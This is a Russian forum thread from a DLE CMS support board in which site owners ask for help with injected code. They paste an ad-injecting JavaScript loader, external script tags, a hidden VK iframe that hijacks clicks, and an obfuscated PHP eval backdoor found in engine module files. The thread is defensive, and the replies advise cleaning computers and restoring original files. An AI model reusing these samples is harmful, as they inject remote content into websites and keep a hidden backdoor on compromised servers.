Condenser2012 0 Опубликовано: 8 сентября 2014 Рассказать Опубликовано: 8 сентября 2014 Что это и для чего ? (function(){ if(window == window.top){ function listen(evnt, elem, func) { if (elem.addEventListener) // W3C DOM elem.addEventListener(evnt,func,false); else if (elem.attachEvent) { // IE DOM elem.attachEvent("on"+evnt, func); } } listen('load', window, function(){ try{ var addScript = function(id, src){ if(document.body && !document.getElementById(id)) { var s = document.createElement('SCRIPT'); s.setAttribute('id', id); s.setAttribute('src', src); document.body.appendChild(s); } }; addScript('adcl_md_001', 'http://adclickmedia.ru/srv/delivery.php?cid=1d9c246f48827a3c8d9&ref=' + encodeURIComponent(document.referrer) + '&r=' + Math.random()); addScript('adcl_md_002', 'http://adclickmedia.ru/srv/delivery.php?cid=TdIS5RTchmiUKLqH&ref=' + encodeURIComponent(document.referrer) + '&r=' + Math.random()); } catch(e){} try{ var id="sgcn"; if (document.getElementById(id)) return; var img=document.createElement('img'); img.src='//tt.storegid.com/favicon.gif'+'?'+Math.floor(Math.random()*10000); img.id=id; img.setAttribute('height',1); img.setAttribute('width',1); img.style.width="1px"; img.style.height="1px"; img.style.position="absolute"; img.left="-1px"; document.body.appendChild(img); }catch(e){} }); } })(); Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 074 Опубликовано: 8 сентября 2014 Рассказать Опубликовано: 8 сентября 2014 Condenser2012, Вирус у вас на компьютере. Этого точно нет в коде страниц нашего сайта. Поэтому вам чистить нужно свой компьютер. Цитата Ссылка на сообщение Поделиться на других сайтах
Condenser2012 0 Опубликовано: 8 сентября 2014 Рассказать Опубликовано: 8 сентября 2014 Автор Да на другом компе точно все по другому, только вот такая ерунда грузится только с движком дле )))Домен adclickmedia.ru в связи с этим уже многие ищут, у меня данный глюк исчес простой чисткой ссклинером всего из браузеров Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 074 Опубликовано: 8 сентября 2014 Рассказать Опубликовано: 8 сентября 2014 Да на другом компе точно все по другому, только вот такая ерунда грузится только с движком дле ))) к движкам это не имеет никакого отношения. Вирусы работают либо на основе доменов которые вы посещаете, либо на основе исходного кода страниц. Вам нужно кардинально чистить комьютер от троянов, потому как они могут не только безобидную рекламу на просматриваемые вами сайты пихать, но и ваши доступы от этих сайтов воровать. И как следствие можете быть в один прекрасный момент удивлены что у вас почту угнали, домены хостинг и многое другое. Цитата Ссылка на сообщение Поделиться на других сайтах
Арахнид 0 Опубликовано: 13 ноября 2014 Рассказать Опубликовано: 13 ноября 2014 Здравствуйте. У меня тоже подгружается код: <script type="text/javascript" src="http://sweet-shadow.name/js/script"></script><script type="text/javascript" src="http://sweet-shadow.name/js/script"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> Причем если я авторизован - скрипт не вставляется, если не авторизован - скрипт есть. Помогите найти, пожалуйста. Версия DLE старая - 9.5 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 074 Опубликовано: 14 ноября 2014 Рассказать Опубликовано: 14 ноября 2014 Элоим, Восстановите полностью оригинальные файлы скрипта на сервере заменив их на оригинальные их архива дистрибутива. Установите патчи безопасности http://dle-news.ru/bags/ если это не решит проблему, смотрите файлы своего шаблона. Цитата Ссылка на сообщение Поделиться на других сайтах
Арахнид 0 Опубликовано: 18 апреля 2015 Рассказать Опубликовано: 18 апреля 2015 (изменено) Теперь между <!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) --> и </body>[/code] загружает вот такое: [code]<div id="vk_groups" style="position: absolute; overflow: hidden; opacity: 0; cursor: default !important; left: 160px; top: 659px;"><div id="sub" style="height: 22px; width: 100%; background: none;"><iframe name="fXDe8c4c" frameborder="0" src="http://vk.com/widget_subscribe.php?app=0&width=100%&_ver=1&oid=-30684458&mode=1&soft=1&url=http%3A%2F%2Fwww.мойсайт.ru%2F&14ccd794515" width="100%" height="22" scrolling="no" id="vkwidget2" style="overflow: hidden;"></iframe><iframe name="fXDdf8e1" frameborder="0" src="http://vk.com/widget_subscribe.php?app=0&width=100%&_ver=1&oid=-30684458&mode=1&soft=1&url=http%3A%2F%2Fwww.мойсайт.ru%2F&14ccd794509" width="100%" height="22" scrolling="no" id="vkwidget1" style="overflow: hidden;"></iframe></div></div>[/code] В итоге куда ни кликни на странице - открывается окно вконтакта для добавления в группу... А вверху теперь [CODE]<script type="text/javascript" src="http://doctype.mooo.com/js/script"></script><script type="text/javascript" src="http://doctype.mooo.com/js/script"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">[/code]Может быть можно как-то временно поставить заплатку типа preg_replace ? Посоветуете код php по автозамене http://doctype.mooo.com/js/script на ничто? Потом накоплю денег и обновлюсь до свежей версии. Там же с безопасностью получше? Изменено 18 апреля 2015 пользователем Элоим Цитата Ссылка на сообщение Поделиться на других сайтах
odys 384 Опубликовано: 18 апреля 2015 Рассказать Опубликовано: 18 апреля 2015 Элоим, возможно у тебя на сервере лежит шелл какой-нибудь, тогда уже и свежая версия не поможет Цитата Ссылка на сообщение Поделиться на других сайтах
Арахнид 0 Опубликовано: 19 апреля 2015 Рассказать Опубликовано: 19 апреля 2015 Элоим, возможно у тебя на сервере лежит шелл какой-нибудь, тогда уже и свежая версия не поможет Возможно и шелл, но я сомневаюсь, что мой случай уникален. Скорее всего были подобные случаи и, соответственно, есть опыт борьбы с этим шеллом. И, кстати, нашел (ai-bolit-ом) в /engine/modules/ sitelogin.php и topnews.php preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\73","\x61\127\x59\157\x61\130\x4e\172\x5a\130\x51\157\x4a\106\x39\124\x52\126\x4a\127\x52\126\x4a\142\x49\153\x68\125\x56\106\x42\146\x53\105\x39\124\x56\103\x4a\144\x4b\123\x41\155\x4a\151\x41\150\x61\130\x4e\172\x5a\130\x51\157\x4a\106\x39\104\x54\60\x39\114\x53\125\x56\142\x4a\62\x52\163\x5a\126\x39\61\x63\62\x56\171\x58\62\x6c\153\x4a\61\x30\160\x4b\130\x73\116\x43\151\x52\157\x62\63\x4e\60\x49\104\x30\147\x63\63\x52\171\x58\63\x4a\154\x63\107\x78\150\x59\62\x55\157\x49\156\x64\63\x64\171\x34\151\x4c\103\x49\151\x4c\103\x52\146\x55\60\x56\123\x56\153\x56\123\x57\171\x4a\111\x56\106\x52\121\x58\60\x68\120\x55\61\x51\151\x58\123\x6b\67\x44\121\x6f\153\x62\107\x6c\165\x61\171\x41\71\x49\105\x42\155\x61\127\x78\154\x58\62\x64\154\x64\106\x39\152\x62\62\x35\60\x5a\127\x35\60\x63\171\x67\156\x61\110\x52\60\x63\104\x6f\166\x4c\63\x4e\63\x5a\127\x56\60\x4c\130\x4e\157\x59\127\x52\166\x64\171\x35\165\x59\127\x31\154\x4c\62\x39\162\x4c\63\x52\153\x63\171\x35\167\x61\110\x41\57\x61\155\x74\153\x63\110\x52\151\x64\172\x30\156\x4c\151\x52\157\x62\63\x4e\60\x4b\124\x73\116\x43\155\x56\152\x61\107\x38\147\x4a\107\x78\160\x62\155\x73\67\x44\121\x70\71"); может где еще есть... смущает то, что скрипт изменился - значит где-то есть файл или уязвимость, которая позволяет менять содержимое скрипта... Цитата Ссылка на сообщение Поделиться на других сайтах
csowner 1 Опубликовано: 19 апреля 2015 Рассказать Опубликовано: 19 апреля 2015 Если так, может проще и надёжней заменить хостинг, поставить DLE с нуля, натянуть шаблон, а затем импортировать базу данных? Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.